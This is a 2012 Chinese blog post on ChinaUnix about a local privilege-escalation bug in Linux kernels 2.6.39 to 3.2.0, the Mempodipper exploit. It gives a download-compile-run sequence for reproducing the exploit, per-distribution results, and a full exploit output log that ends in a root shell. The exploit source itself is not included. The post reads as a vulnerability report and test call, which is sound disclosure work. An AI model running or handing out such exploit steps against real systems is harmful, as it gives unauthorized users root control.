Chinaunix首页 | 论坛 | 博客

好想好好爱你!badb0y.blog.chinaunix.net

首页 |  博文目录 |  关于我

badb0y

  • 博客访问: 7404205
  • 博文数量: 1756
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16232
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1756)

文章存档

2024年(2)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

我的朋友
最近访客
推荐博文
相关博文
Linux 2.6.39到3.2.0爆提权漏洞

分类: LINUX

2012-02-13 15:41:35

Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。

重现方法:

wget cc mempodipper.c ./a.out

在执行完毕后运行 whoami 来看是否执行成功。



已知发行版情况:

Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
Arch Linux: 失败。内核 3.2.2-1-ARCH

如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。


我机子上测试成功了

===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root

Ubuntu11.10

Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
来源:

阅读(1154) | 评论(0) | 转发(0) |
0

上一篇:phpwind 6.3.2发邮件乱码解决办法

下一篇:ssh HTML5---GateOne

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6